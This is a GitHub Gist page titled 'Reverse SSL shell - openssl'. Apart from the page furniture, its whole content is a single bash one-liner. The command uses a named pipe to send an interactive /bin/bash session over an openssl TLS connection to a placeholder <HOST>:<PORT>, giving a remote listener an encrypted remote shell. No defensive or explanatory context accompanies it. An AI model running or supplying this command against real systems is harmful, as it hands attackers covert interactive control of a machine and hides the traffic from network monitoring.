Skip to content

Instantly share code, notes, and snippets.

@omartrigui
Created February 12, 2018 00:10
Show Gist options
  • Save omartrigui/975a879362999fc8c6ce659f7b8c22b3 to your computer and use it in GitHub Desktop.
Save omartrigui/975a879362999fc8c6ce659f7b8c22b3 to your computer and use it in GitHub Desktop.
Reverse SSL shell - openssl
mkfifo /tmp/s; /bin/bash -i < /tmp/s 2>&1 | openssl s_client -quiet -connect <HOST>:<PORT> > /tmp/s; rm /tmp/s
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment